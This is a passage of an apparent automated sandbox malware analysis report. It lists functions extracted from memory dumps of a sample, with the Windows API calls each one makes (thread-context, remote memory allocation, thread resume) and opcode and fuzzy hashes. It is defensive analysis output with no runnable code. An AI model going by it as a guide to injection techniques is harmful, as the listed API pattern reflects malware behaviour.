                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED590E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 2d9bf24dab89892f69c27ff51ef59828067c1545ef71a4e252ab953050ce9959
                                                        • Instruction ID: 2294f87845e4388a5c3d5ca102079507b64a679920ff03658b01b3048dd2223c
                                                        • Opcode Fuzzy Hash: 2d9bf24dab89892f69c27ff51ef59828067c1545ef71a4e252ab953050ce9959
                                                        • Instruction Fuzzy Hash: 462118B1D003098FDB10DFAAC4857EEBBF4EF48324F148429D559A7240C7789945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007FE1A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007FE22F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: c55a2b1463247057d62e7a16de0b67468c8b0bba6b0f9ee8c609bd9af2751665
                                                        • Instruction ID: ed8b95f4f6de4792b7791d8b809d9655bd4a4a86c3d28dec69b57654bdb3ce0c
                                                        • Opcode Fuzzy Hash: c55a2b1463247057d62e7a16de0b67468c8b0bba6b0f9ee8c609bd9af2751665
                                                        • Instruction Fuzzy Hash: EA21C4B59002589FDB10CF9AD984AEEBFF8FB48310F14841AE958A7350D378A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007FB6C8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007FBF99,00000800,00000000,00000000), ref: 007FC1AA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: e91d793adffb9c9772e55783d53d688de127430a1d74af090c1062fe83c7304c
                                                        • Instruction ID: 252cb7b3d11d8491964dc9614efed72faa2a245d9bdd312ef8387d26cbafaf85
                                                        • Opcode Fuzzy Hash: e91d793adffb9c9772e55783d53d688de127430a1d74af090c1062fe83c7304c
                                                        • Instruction Fuzzy Hash: 791114B6D0020D9FDB20CF9AD944AEEFBF4EB48310F10842AE519A7311C379A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5960 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ED59D6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: abf0154b4a208da6195b57a4978a0f7e95e12ec6d265305370ccccaeedf77066
                                                        • Instruction ID: 1c3c8f613a0f058e051b01dbbeb059034a90b7233e9d3e0e8e2c5a20e0a8b734
                                                        • Opcode Fuzzy Hash: abf0154b4a208da6195b57a4978a0f7e95e12ec6d265305370ccccaeedf77066
                                                        • Instruction Fuzzy Hash: 7E116AB19002498FCB20DFA9D845BEEBFF5EF88324F24842AE559A7250C7759545CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5968 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ED59D6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 08cf04647b8c96a54539ca7633122092b036997a469dd906c0d69b6c3abc5a8a
                                                        • Instruction ID: 98bb4422c355e73818a59720ce93949a539150cc641744463edab609c21ed337
                                                        • Opcode Fuzzy Hash: 08cf04647b8c96a54539ca7633122092b036997a469dd906c0d69b6c3abc5a8a
                                                        • Instruction Fuzzy Hash: 7F1137B19002499FCB10DFAAC845BDEBFF5EF88324F24841AE569A7250C775A944CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007FC138 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007FBF99,00000800,00000000,00000000), ref: 007FC1AA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: adacbd001e0dc0469c20c73006536c6aa44fa93c554b23d8624920f21fc92bab
                                                        • Instruction ID: 2b75b50b6fd2d72574ad262bef0008ebbd59ee698a9c303ac0027953cba37e2e
                                                        • Opcode Fuzzy Hash: adacbd001e0dc0469c20c73006536c6aa44fa93c554b23d8624920f21fc92bab
                                                        • Instruction Fuzzy Hash: B31126B6D003498FDB10CFAAC944ADEFBF4EB48320F14842AD559A7311C379A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED53A2 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 4d889cf6b47f272289dd8309336745f7369beddb755a1a76f19497deccf47e3b
                                                        • Instruction ID: da2117c05c042116f90c654312d0dea41027917cc6b56e5d780bd0effcca0baf
                                                        • Opcode Fuzzy Hash: 4d889cf6b47f272289dd8309336745f7369beddb755a1a76f19497deccf47e3b
                                                        • Instruction Fuzzy Hash: 2F1146B19003488BCB20DFAAC8457DEFFF4EB88324F248429D559A7240CB75A945CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED53A8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: bf2e5f6b1ceb494128729c482f493d001cdd6a7ca34f43d4e365aacc455e9986
                                                        • Instruction ID: 6ec00af53b883bef39b65230c7fdcf2a1b7c8c68086320a35c0bb7c4391ff64c
                                                        • Opcode Fuzzy Hash: bf2e5f6b1ceb494128729c482f493d001cdd6a7ca34f43d4e365aacc455e9986
                                                        • Instruction Fuzzy Hash: 461136B1D003488FCB20DFAAC8457DEFBF4EB88324F208429D559A7250CB75A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06EDA918 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06EDA97D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 26c1f005728876bd92952a7b772e7b5d7af2813574823875a411666144a8633d
                                                        • Instruction ID: b8952f816281a8edd5d07830af9e669a1ee691d31bdfba42be52fe494f69667e
                                                        • Opcode Fuzzy Hash: 26c1f005728876bd92952a7b772e7b5d7af2813574823875a411666144a8633d
                                                        • Instruction Fuzzy Hash: 341106B58003489FCB10DF99D885BDEFFF8EB48320F108459E558A7210C375A945CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06ED5CF0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06EDA97D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: e49b94aef7d2728f487dbb9c67eb1e51e96045ca662bf9e49addb0ef2575e413
                                                        • Instruction ID: a4154ad684b1b21effc4933b5383e800f694a4638c705df13d859b2e4a895522
                                                        • Opcode Fuzzy Hash: e49b94aef7d2728f487dbb9c67eb1e51e96045ca662bf9e49addb0ef2575e413
                                                        • Instruction Fuzzy Hash: 1B1106B5800348DFDB10DF99D845BDEBFF8EB48320F108419E558A7210C375A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007FBEB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 007FBF1E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: d2daa0e9e22b379b700a9783d038d9e00dacd76ece8f32d5a3d8bfa1e39540a3
                                                        • Instruction ID: cebc51ff09ba16f4b75661a7d661c118b60745a5c8ad1f78d8be9aea83586710
                                                        • Opcode Fuzzy Hash: d2daa0e9e22b379b700a9783d038d9e00dacd76ece8f32d5a3d8bfa1e39540a3
                                                        • Instruction Fuzzy Hash: 7F11E0B6C002498FCB10CF9AD844ADEFBF4EB88324F14842AD569A7310C379A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A12F10 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq
                                                        • API String ID: 0-1245868
                                                        • Opcode ID: 9702fbec9a6d139b1750ebe9da325b0d2e737682a70c1c8f87ba97458c8211e4
                                                        • Instruction ID: 9f73709ab815a4081675790f8523be70a923b0d8087e837dad2b7e2c9ac0baae
                                                        • Opcode Fuzzy Hash: 9702fbec9a6d139b1750ebe9da325b0d2e737682a70c1c8f87ba97458c8211e4
                                                        • Instruction Fuzzy Hash: 76619B30B002089FCB58EB78D4546AE7BB6EFC5310F2485A9D4599F3A1CE35DE46CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D36D14 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: b56caad010c425eb06d44a664564f31a7ec8b4c3e39024f590365a5145384c27
                                                        • Instruction ID: 2b8b38f004a914c8d7126141c03888db83bda5089b1993589523923af54e5dd7
                                                        • Opcode Fuzzy Hash: b56caad010c425eb06d44a664564f31a7ec8b4c3e39024f590365a5145384c27
                                                        • Instruction Fuzzy Hash: CD519E31B002168FCB15DB7999589BEBBF6EFC4220724896AE469DB391EB309D058790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A13992 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 5dc314f12b176c60957c69362aa243b2a20394593c2b0e9ac6519f5b2737f4da
                                                        • Instruction ID: 9e3b3ac3d22b18f244607696cac820dd4f273f7efcae4c0c5e9765f42d5ecf7d
                                                        • Opcode Fuzzy Hash: 5dc314f12b176c60957c69362aa243b2a20394593c2b0e9ac6519f5b2737f4da
                                                        • Instruction Fuzzy Hash: A7515530A046058FDB54DF39C998BAABBB1EF49304F1981A9E446DF262DB35EC45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A12768 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 5d4de5bce3544984753ccf2a9d3b70dcacd6c88d914c2c2691f7f29179ea5a6f
                                                        • Instruction ID: 27d945672969f4000086afb0e71dec0cbed1b288eb565944d3052505d05f6dd4
                                                        • Opcode Fuzzy Hash: 5d4de5bce3544984753ccf2a9d3b70dcacd6c88d914c2c2691f7f29179ea5a6f
                                                        • Instruction Fuzzy Hash: F851E334A102048FCB94EF68C598AA9BBF1BF49714B1585A8E416EF3B1DB31ED85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A18B90 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq
                                                        • API String ID: 0-149360118
                                                        • Opcode ID: c4e8914c990fedd4a5ce5b2b169a21602a106853c57c3ad341c7e0a06eec7364
                                                        • Instruction ID: c4849f781cefc2620dddbda5697589e10be62368cc43661171157d963933563b
                                                        • Opcode Fuzzy Hash: c4e8914c990fedd4a5ce5b2b169a21602a106853c57c3ad341c7e0a06eec7364
                                                        • Instruction Fuzzy Hash: B931BC71E052598FCB44EFB998141EEBBF2EF89310F24846AD915FB250EA3099058BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A13B8C Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq
                                                        • API String ID: 0-149360118
                                                        • Opcode ID: ad1589e1e5233e35106bf081b6cc0646e1461c1754ee8b6009c5afac2287146b
                                                        • Instruction ID: 0f143154db33ba0e9433713b20f69209e46fdaf4ec3c7a1bfccb0ec7c8d1e08d
                                                        • Opcode Fuzzy Hash: ad1589e1e5233e35106bf081b6cc0646e1461c1754ee8b6009c5afac2287146b
                                                        • Instruction Fuzzy Hash: F2415E306006108FDBA4AF38C448B9A7BA6BF85314F1585A9D05ACF3A1CF75E88ACB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D3C350 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O};5
                                                        • API String ID: 0-3558557551
                                                        • Opcode ID: 6b8c982406f615e2ef35b8afacb0edbb303bb349a7e6d6048cd3408fa5df1219
                                                        • Instruction ID: 74be86ff04f5ce6ebfb02f6fe71e2187a24b5285a778aa3243f1fa39929aea88
                                                        • Opcode Fuzzy Hash: 6b8c982406f615e2ef35b8afacb0edbb303bb349a7e6d6048cd3408fa5df1219
                                                        • Instruction Fuzzy Hash: 8E415970A14619DFDB84CFA9D5848AEFBB2FF89300B60D895C459AB328D730DA25CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1F208 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 5942296f30994c21e23283e38282075c890f567cc0ec8255c98dc1ba111275a4
                                                        • Instruction ID: b811863d9180a4405d3c6061e1b0064140cb0178720c4f3529bed0c28471c384
                                                        • Opcode Fuzzy Hash: 5942296f30994c21e23283e38282075c890f567cc0ec8255c98dc1ba111275a4
                                                        • Instruction Fuzzy Hash: 63315C74E05248CFDB44DFAAC4456EEBBF6AF89300F14802AD419AF354DB345906CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1F218 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 2887c698ccfda54acbf8a100169a0995a5b2455e55dab78c9a33c0f12924e36d
                                                        • Instruction ID: dea95f48c9d4210a6f416962d332aedf54dbe769b2f9246623e5677f18a362de
                                                        • Opcode Fuzzy Hash: 2887c698ccfda54acbf8a100169a0995a5b2455e55dab78c9a33c0f12924e36d
                                                        • Instruction Fuzzy Hash: F931F474E04248CFDB48DFEAC5446AEFBF6AF89300F10802AD419AB358DB345906CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D3DDE0 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8bq
                                                        • API String ID: 0-187764589
                                                        • Opcode ID: 9c2445df45e24092eba2be7419077d72a143a0ae5f1bb28ddc52314bb9095b51
                                                        • Instruction ID: 1efffcdc88623fb4ed3d84e36c472ff5f246c1cf62c059f827076b8b646d2260
                                                        • Opcode Fuzzy Hash: 9c2445df45e24092eba2be7419077d72a143a0ae5f1bb28ddc52314bb9095b51
                                                        • Instruction Fuzzy Hash: 363125B4E04219CFDB84EFA9D944AAEBBF6FB49300F108029D556B7354DB345A45CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1B982 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8bq
                                                        • API String ID: 0-187764589
                                                        • Opcode ID: a2fd50ca8e4977037a37da1098dad465a69dc2458f9b7c2b98816d72a5e29b61
                                                        • Instruction ID: 927ce23a8a58d11ef9eeefa01cd5dffd4438c8d210830bc4bcdc51ee4e3d9ee6
                                                        • Opcode Fuzzy Hash: a2fd50ca8e4977037a37da1098dad465a69dc2458f9b7c2b98816d72a5e29b61
                                                        • Instruction Fuzzy Hash: 01215E78E08249CFCB00DFA8D5508EEBBF1FB4E304B104566D519AB3A5E7345A06CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D3E0D8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 4e0670163de0e1dfbc71f2354edbfd96748ae3bfb6bbccafe865f9eb0a899cfd
                                                        • Instruction ID: e379f4caa785bc63acbe8acc563cf45b8a2efd086710eba704b93f00def835ec
                                                        • Opcode Fuzzy Hash: 4e0670163de0e1dfbc71f2354edbfd96748ae3bfb6bbccafe865f9eb0a899cfd
                                                        • Instruction Fuzzy Hash: 8E112131F002199BCB54EBB9D9105EEB7F6AF85250B20406AC505E7344EB358D06CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1F2E4 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: d070b165f6eef825478772a7417263ba0c0fdd3e3dbbfdb275c84099b3f48e49
                                                        • Instruction ID: ddc3b7ab0ae597332db4aecfdf552ef4d76e6e954f9295ae309ed67f337ea1dc
                                                        • Opcode Fuzzy Hash: d070b165f6eef825478772a7417263ba0c0fdd3e3dbbfdb275c84099b3f48e49
                                                        • Instruction Fuzzy Hash: AF114F75E00219DFCF08DFE9D8849ADBBB2FB88310F10812AEA19AB365C7356955CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1084B Relevance: .4, Instructions: 410COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb715300ac79195902046085f0a330d82ce4d1120e5c52848b7968a96f70591c
                                                        • Instruction ID: 2c856b7ab0e1f579e771a08b904126abba1e6dc2a7864e1ebc813f2bbffb84cb
                                                        • Opcode Fuzzy Hash: eb715300ac79195902046085f0a330d82ce4d1120e5c52848b7968a96f70591c
                                                        • Instruction Fuzzy Hash: 2202E434A40104DFDB54EF68D598AADBBF2BF89314F1581A8E4099F366CB35EC85CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D3F6F8 Relevance: .2, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 326097b077e22b647f9793c21859244c72225da72b3e1cdfde8de1944e6ab9d4
                                                        • Instruction ID: 9cb4d3223b1cb9f078da6f72bb68b352b47efc07094aaa0eef83e00e482e0f59
                                                        • Opcode Fuzzy Hash: 326097b077e22b647f9793c21859244c72225da72b3e1cdfde8de1944e6ab9d4
                                                        • Instruction Fuzzy Hash: 516138B4D0921DDFDF48CFA9D444AEEBBB6EF49300F109029E519AB215D7709946CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D3ED88 Relevance: .2, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 091a83a222de7102b4dbaeba1368e7ec134ba948e782b9e54633b28fb450ff7b
                                                        • Instruction ID: b305350b344212f51294130c781b775f3b1fd30444e46a76a24b16d7725bf772
                                                        • Opcode Fuzzy Hash: 091a83a222de7102b4dbaeba1368e7ec134ba948e782b9e54633b28fb450ff7b
                                                        • Instruction Fuzzy Hash: 45611A31A00619DFDB54DFA9C454A9DBBF1FF88310F21815AE509AB3A0DB71ED45CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1FA19 Relevance: .1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75c67b9889e71675b81df7a22db30fb73e8d7bc84702afd33a4997ff8a2cff85
                                                        • Instruction ID: d39061b4f38a30c1cacfa6853a9d56dd93de0ffa1d5cbca58934ada18310014a
